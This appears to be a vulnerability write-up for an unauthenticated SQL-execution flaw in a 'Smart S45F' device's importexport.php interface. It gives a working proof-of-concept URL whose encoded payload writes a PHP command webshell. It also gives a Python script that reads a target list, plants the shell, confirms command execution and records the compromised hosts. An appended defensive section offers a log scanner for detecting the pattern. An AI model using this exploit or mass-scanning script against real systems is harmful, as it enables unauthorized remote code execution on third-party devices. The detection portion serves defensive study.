Root cause
The SQL statement execution interface can be reached without authentication, so arbitrary SQL statements can be executed.
Affected scope
Smart S45F
Impact
A remote attacker can use this vulnerability to execute arbitrary SQL statements, including writing a webshell.
POC & EXP
Manual
Vulnerable location: https://ip:port/importexport.php
This interface executes SQL statements passed in GET parameters:
Parameter sql: the base64-encoded SQL statement
Parameter type=exportexcelbysql: the action to perform
POC:
https://ip:port/importexport.php?sql=c2VsZWN0IDB4M2MzZjcwNjg3MDIwNjU2MzY4NmYyMDczNzk3Mzc0NjU2ZDI4MjQ1ZjUwNGY1MzU0NWIyMjYzNmQ2NDIyNWQyOTNiM2YzZSBpbnRvIG91dGZpbGUgJy91c3IvaGRkb2NzL25zZy9hcHAvc2VjLnBocCc=&type=exportexcelbysql
base64 decodes to: select 0x3c3f706870206563686f2073797374656d28245f504f53545b22636d64225d293b3f3e into outfile '/usr/hddocs/nsg/app/sec.php'
hex decodes to: <?php echo system($_POST["cmd"]);?>
Webshell address: https://ip:port/app/sec.php
Script
import requests

# Route all requests through a local proxy (e.g. for traffic inspection)
proxies = {
    'http': 'http://127.0.0.1:7890',
    'https': 'http://127.0.0.1:7890'
}

# One target base URL per line in order.txt
url = []
with open("order.txt", "r") as file:
    url = file.readlines()

# Targets that respond are recorded in get.txt
file = open("get.txt", "w")
for i in url:
    try:
        # Send the base64-encoded SQL statement to the unauthenticated interface
        response = requests.get(i + '/importexport.php?sql=c2VsZWN0IDB4M2MzZjcwNjg3MDIwNjU2MzY4NmYyMDczNzk3Mzc0NjU2ZDI4MjQ1ZjUwNGY1MzU0NWIyMjYzNmQ2NDIyNWQyOTNiM2YzZSBpbnRvIG91dGZpbGUgJy91c3IvaGRkb2NzL25zZy9hcHAvc2VjLnBocCc=&type=exportexcelbysql', proxies=proxies)
        if response.status_code == 200:
            # Check whether the written file answers a command
            response = requests.post(i + '/app/sec.php', data={'cmd': 'ipconfig'}, proxies=proxies)
            if response.status_code == 200 and ("eth" in response.text):
                print("get it!" + i)
                file.write(i)
            else:
                print(str(response.status_code) + ": " + response.text)
    except:
        pass
file.close()
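As an added defensive example (not part of the original write-up), the following Python scans web-server access-log lines for the request pattern described above: a GET to importexport.php with type=exportexcelbysql, decoding the base64 sql parameter and escalating when it contains INTO OUTFILE or DUMPFILE, then flagging later requests to the file that statement named. The log lines are constructed, and the Common Log Format layout, the field names and the basename-matching heuristic are assumptions of this example.

```python
import base64
import binascii
import re
from urllib.parse import parse_qs, urlsplit

# Constructed access-log sample (not from the original page): line 1 mirrors the GET
# described above, line 2 the follow-up POST to the dropped file, line 3 is benign.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /importexport.php?sql=c2VsZWN0IDB4M2MzZjcwNjg3MDIwNjU2MzY4NmYyMDczNzk3Mzc0NjU2ZDI4MjQ1ZjUwNGY1MzU0NWIyMjYzNmQ2NDIyNWQyOTNiM2YzZSBpbnRvIG91dGZpbGUgJy91c3IvaGRkb2NzL25zZy9hcHAvc2VjLnBocCc=&type=exportexcelbysql HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "POST /app/sec.php HTTP/1.1" 200 88
10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /index.php HTTP/1.1" 200 2048
"""

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
# INTO OUTFILE / DUMPFILE is what turns a free SELECT into a file write.
FILE_WRITE_RE = re.compile(r"\binto\s+(?:outfile|dumpfile)\s+'([^']+)'", re.IGNORECASE)


def decode_sql_param(target):
    """Decode the base64 `sql` parameter of an exportexcelbysql request, else None."""
    parts = urlsplit(target)
    query = parse_qs(parts.query)  # URL-decodes, so %3D padding is handled
    if not parts.path.endswith("/importexport.php") or query.get("type") != ["exportexcelbysql"]:
        return None
    try:
        return base64.b64decode(query.get("sql", [""])[0], validate=True).decode("utf-8", "replace")
    except (binascii.Error, ValueError):
        return "<undecodable sql parameter>"


def scan_access_log(log_text):
    """Flag hits on the SQL interface; also flag later requests to a file it wrote (by basename)."""
    findings, dropped = [], set()
    for line in log_text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        client, target = line.split()[0], m.group("target")
        sql = decode_sql_param(target)
        if sql is not None:
            write = FILE_WRITE_RE.search(sql)
            if write:
                dropped.add(write.group(1).rsplit("/", 1)[-1])
            findings.append({"client": client, "kind": "sql_exec",
                             "severity": "critical" if write else "high", "sql": sql})
        elif urlsplit(target).path.rsplit("/", 1)[-1] in dropped:
            findings.append({"client": client, "kind": "dropped_file_access",
                             "severity": "critical", "path": urlsplit(target).path})
    return findings
```

Any request to this interface is worth alerting on by itself, since the endpoint requires no authentication; the decoded statement only decides the severity.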